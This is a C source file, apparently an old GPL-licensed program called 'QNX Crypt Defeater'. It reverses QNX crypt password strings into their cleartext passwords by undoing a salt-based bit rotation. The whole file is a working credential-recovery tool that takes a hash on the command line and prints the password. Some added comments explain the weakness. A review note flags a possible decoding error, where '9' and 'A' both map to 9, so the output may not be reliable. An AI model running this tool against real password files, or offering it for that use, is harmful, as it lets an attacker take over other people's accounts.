/* I'd like to thank the morons at QNX for writing their own crypt function,
   and thus making this program possible.

for everyone who's interested, the crypt source is located here:
ftp://ftp.visi.com/users/hawkeyd/qnx/

take a look at the header of that source, also take a look at how they
actually overflow the bits[] array on accident...  I sure hope that's not
qnx's actual source.

-sean


See LICENSE for licensing information... yes, it's GPL
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


// there was a bug in ascii2bin... 
// it's been fixed
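/**
 * Map one character of the encoded hash back to its numeric value.
 *
 * Three ranges are recognised:
 *   '0' up to (not including) 'A'  ->  x - '0'
 *   'A' up to (not including) 'a'  ->  (x - 'A') + 9
 *   everything else                ->  (x - 'a') + 35
 *
 * No validation is done: a character below '0' falls into the last branch
 * and produces a negative value.
 * NOTE(review): '9' and 'A' both map to 9 -- confirm against the encoder.
 *
 * The return type is now spelled out; the original relied on implicit int,
 * which has not been valid C since C99.
 *
 * @param x  character code taken from the hash string
 * @return   decoded value for that character
 */
static int ascii2bin(short x)
{
  if (x >= '0' && x < 'A')
    return x - '0';
  if (x >= 'A' && x < 'a')
    return (x - 'A') + 9;
  return (x - 'a') + 26 + 9;
}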
/* Scratch bit grid for quncrypt(): one password bit (0 or 1) per element.
   quncrypt() writes indices 0..71 and uses index 66 as the carry slot while
   rotating; the remaining elements are unused slack. */
char bits[77];

/* the uncryptor */
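/**
 * Reverse a QNX crypt string back into the password it encodes.
 *
 * The scheme is an encoding rather than a one-way hash: the two salt
 * characters only select a rotation count, and the remaining twelve
 * characters carry the password bits, so the cleartext comes back without
 * any guessing.  Strings in this format deserve the same protection as
 * plaintext passwords.
 *
 * @param pw  NUL-terminated crypt string: 2 salt characters followed by 12
 *            encoded characters.  Only the first 14 characters are read.
 * @return    Pointer to a static buffer holding the recovered password
 *            (8 bytes plus a terminating NUL).  That buffer and the global
 *            bits[] array are overwritten on every call, so the function
 *            is not reentrant.  An empty string is returned when pw is
 *            NULL, is shorter than 14 characters, or carries a salt that
 *            yields a negative rotation count.
 */
char *quncrypt(char *pw)
{
  static char newpw[14];
  char salt[2];
  int i, j, rot;
  int bit;

  newpw[0] = 0;  /* result handed back for every rejected input */

  /* The code below reads pw[0..13]; refuse anything shorter instead of
     reading past the string terminator. */
  if (pw == NULL || strlen(pw) < 14)
    return newpw;

  salt[0] = *pw++;
  salt[1] = *pw++;  /* first 2 chars of pw are the salt */

  /* Here's all the salt does: set up a rotation.  Salt bytes outside the
     expected range can make the count negative, and the rotate loop below
     would then count down without a sane bound, so reject them. */
  rot = (salt[1] * 4 - salt[0]) % 128;
  if (rot < 0)
    return newpw;

  for (i = 0; i < 72; i++)
    bits[i] = 0;
  for (i = 0; i < 12; i++)
    newpw[i] = ascii2bin(pw[i]);  /* convert back to bin */
  newpw[12] = 0;
  newpw[13] = 0;

  /* Take the password bits and put them into a 2 dimensional grid (12 rows
     of 6 bits), which then gets shifted around by the salt.  Highest index
     written is 71, inside bits[77]; the author notes that QNX's own crypt
     overflows its array at this step. */
  for (i = 0; i < 12; i++)
  {
    for (j = 0; j < 6; j++)
    {
      bit = newpw[i] & (1 << j);
      bits[i * 6 + j] = bit ? 1 : 0;
    }
  }
  // bits[66]=1; //this was a hack here...
  // bits[67]=0; //uncomment it back out if a specific pwd isn't working

  /* The big rotate: each pass moves bits[0..65] one place towards index 0,
     with bits[66] acting as the carry slot for the wrapped-around bit. */
  while (rot--)
  {
    bits[66] = bits[0];
    for (i = 0; i <= 65; i++)
      bits[i] = bits[i + 1];
  }

  /* Compile the bit array back into text: output byte i collects bits
     i, i+8, ..., i+48 as its bits 0..6. */
  for (i = 0; i < 8; i++)
  {
    newpw[i] = 0;
    for (j = 0; j < 7; j++)
    {
      bit = bits[i + j * 8];
      newpw[i] |= (bit << j);
    }
  }
  newpw[8] = 0;  /* only 8 bytes needed */
  return newpw;
}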

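/**
 * Command-line entry point: takes exactly one argument, the crypt string,
 * and prints the cleartext recovered by quncrypt().
 *
 * @return 0 after printing the usage text or the cleartext; EXIT_FAILURE
 *         when the argument is too short to be a crypt string.
 */
int main(int argc, char *argv[])
{
  char *cr;

  if (argc != 2)
  {
    printf("QNX Crypt Defeater.. by Sean\n");
    printf("reverse [hashcode]\n");
    exit(0);
  }

  /* quncrypt() consumes 14 characters (2 salt + 12 encoded); a shorter
     argument would make it read past the end of the string. */
  if (strlen(argv[1]) < 14)
  {
    fprintf(stderr, "hashcode must be at least 14 characters\n");
    return EXIT_FAILURE;
  }

  printf("Uncrypting...booya!\n");
  cr = quncrypt(argv[1]);
  printf("Cleartext:%s\n", cr);
  return 0;
}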


